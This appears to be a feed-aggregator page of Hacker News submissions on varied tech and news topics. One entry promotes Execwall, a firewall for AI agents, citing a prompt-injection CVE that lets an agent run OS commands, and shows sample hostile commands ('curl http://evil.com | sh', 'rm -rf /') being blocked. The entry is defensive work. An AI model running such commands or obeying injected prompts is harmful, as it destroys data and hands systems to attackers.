Feed aggregator
Show HN: diz – SSH key exchange in one command each side
Article URL: https://github.com/noahra/diz
Comments URL: https://news.ycombinator.com/item?id=47371397
Points: 1
# Comments: 0
The Playbook and Play-Engine Site (2003)
Article URL: https://www.wisdom.weizmann.ac.il/~playbook/
Comments URL: https://news.ycombinator.com/item?id=47371379
Points: 1
# Comments: 1
Digg cuts jobs after facing AI bot surge
Article URL: https://www.reuters.com/technology/digg-cuts-jobs-after-facing-ai-bot-surge-2026-03-13/
Comments URL: https://news.ycombinator.com/item?id=47371366
Points: 1
# Comments: 1
macOS backups with Kopia and Backblaze (2023)
Article URL: https://hmarr.com/blog/mac-backups-with-kopia/
Comments URL: https://news.ycombinator.com/item?id=47371365
Points: 2
# Comments: 0
Dust Outbreak Reaches Europe
Article URL: https://science.nasa.gov/earth/earth-observatory/dust-outbreak-reaches-europe/
Comments URL: https://news.ycombinator.com/item?id=47371354
Points: 1
# Comments: 0
How the Iran War Threatens Big Tech's AI Data Center Buildout in the Middle East [video]
Article URL: https://www.youtube.com/watch?v=-vhTIkq9-ng
Comments URL: https://news.ycombinator.com/item?id=47371343
Points: 1
# Comments: 0
Harnessing eDNA to help conserve Australia's oceans
Article URL: https://phys.org/news/2026-03-harnessing-edna-australia-oceans.html
Comments URL: https://news.ycombinator.com/item?id=47371332
Points: 1
# Comments: 0
The AI that taught itself: Researchers show how AI can learn what it never knew
Execwall – firewall to stop ModelScope CVE-2026-2256 (AI agent command injectn)
CVE-2026-2256 just dropped - a prompt injection in ModelScope's ms-agent allows arbitrary OS command execution. CVSS 6.5, no auth required.
This is exactly why I built Execwall: an execution firewall for AI agents. The problem: AI agents that can execute code are one prompt injection away from rm -rf /. The solution: A security layer directly embedded in the shell and between app and kernel: - Seccomp-BPF filtering - Block dangerous syscalls before they execute - Policy engine - Regex allowlist/denylist for commands embedded in shell - Namespace isolation - Python sandbox with separate mount/PID/network - Rate limiting - Prevent automated exploitation Even if an attacker injects a malicious prompt, the command gets blocked at the execution firewall: [execwall]$ curl http://evil.com | sh [X] DENIED: Network command blocked by policy [execwall]$ rm -rf / [X] DENIED: Recursive deletion blocked Written in Rust. Works with any LLM agent framework. GitHub: https://github.com/sundarsub/execwall CVE details: https://radar.offseq.com/threat/cve-2026-2256-cwe-94-improper-control-of-generatio-97245d82
Comments URL: https://news.ycombinator.com/item?id=47371292
Points: 1
# Comments: 0
Ask HN: Has anyone built an AI agent that spends real money?
I want to build an AI agent that shops autonomously – you give it a card once, and it handles browsing, selecting, and paying on its own.
I've been working on an MCP server that connects AI agents to payment providers (Stripe, PayPal, virtual cards), but
I keep hitting walls:
- Card issuers won't respond to individual developers
- Stripe requires 3D Secure for off-session payments
- E-commerce sites block browser automation
- Amazon v. Perplexity (March 9) confirmed that browser automation on major platforms carries real legal risk
Meanwhile Visa announced "Intelligent Commerce" and Mastercard launched "Agent Pay" – the networks see this coming, but the developer tooling isn't there yet. Has anyone actually shipped something like this? Concrete links, working examples, or constructive feedback would be especially helpful.
- What payment rail did you use?
- Is this a viable product or a regulatory minefield?
- Would you trust an AI with a $500 prepaid card to buy something for you?
What I have so far: https://github.com/xodn348/clawpay
Comments URL: https://news.ycombinator.com/item?id=47371289
Points: 1
# Comments: 0
Waitrose suspends sale of mackerel because of overfishing
Article URL: https://www.theguardian.com/environment/2026/feb/26/waitrose-suspends-sale-mackerel-overfishing
Comments URL: https://news.ycombinator.com/item?id=47371288
Points: 1
# Comments: 0
High Grow Market Equilibrium After the Singularity
Article URL: https://www.lesswrong.com/posts/WS3JBPsBGtJvFDEjy/high-grow-market-equilibrium-after-the-singularity
Comments URL: https://news.ycombinator.com/item?id=47371286
Points: 1
# Comments: 0
Stop repeating yourself to Claude Code
Article URL: https://www.gopeek.ai
Comments URL: https://news.ycombinator.com/item?id=47371284
Points: 4
# Comments: 1
Bringing Software Development Practices to PhD-Level Neuroscience Research
Article URL: https://ideas.tbrianjones.com/posts/2026-03-08-research-engineering/
Comments URL: https://news.ycombinator.com/item?id=47370895
Points: 1
# Comments: 1
Today's NYT Connections Hints, Answers and Help for March 14, #1007
Today's Wordle Hints, Answer and Help for March 14, #1729
TinyForge: Letting a 0.8B coding model learn from failure feedback on a MacBook
I ran a small experiment with tiny language models and got results that surprised me.
Setup:
Model: Qwen 3.5 0.8B (4-bit) Hardware: MacBook Air M4 RAM: ~6GB runtime Task: HumanEval coding problems
Loop:
-Model writes a solution -Code is executed against tests -If it fails, the model sees the exact failure (input, expected output, actual output) -It retries several times (small evolutionary search) -Broken solutions are paired with repaired versions -LoRA train on those repair pairs
Training data was extremely small.
-13 repair pairs total -~3 minutes of LoRA training on the laptop
Results on HumanEval slices the model never saw:
-Single pass improved from 16/50 → 28/50 -Hardest subset improved from 0/8 → 3/8
What surprised me was where the improvement shows up.
If you just ask the model to generate code once after training, the improvement is modest.
But when you place the trained model back inside the repair loop (where it sees test failures and retries), performance improves significantly. It appears the model isn't memorizing answers. It is learning the pattern of how to use failure feedback to repair code.
Small models don't have the capacity to memorize many solutions, but they can apparently learn the structure of:
"Here is exactly what failed → here is how I fix it."
This might generalize to other domains where automatic verification exists:
-SQL queries -math problems -data transformations -program synthesis
Everything runs locally. No cloud compute or APIs.
Peak memory during training was ~10GB. Runtime inference sits around ~6GB.
Code is here if anyone wants to try it or critique the approach: https://github.com/ranausmanai/tinyforge
Curious if others experimenting with small models have seen similar behavior when training on repair pairs instead of correct answers.
Comments URL: https://news.ycombinator.com/item?id=47370841
Points: 1
# Comments: 0
Google Fiber will be sold to private equity firm and merge with cable company
Drone strikes in Haiti that killed 1250, 17 children, condemned by rights group
Article URL: https://haitiantimes.com/2026/03/11/hrw-condemns-haiti-drone-strikes-killing-children/
Comments URL: https://news.ycombinator.com/item?id=47370822
Points: 1
# Comments: 0
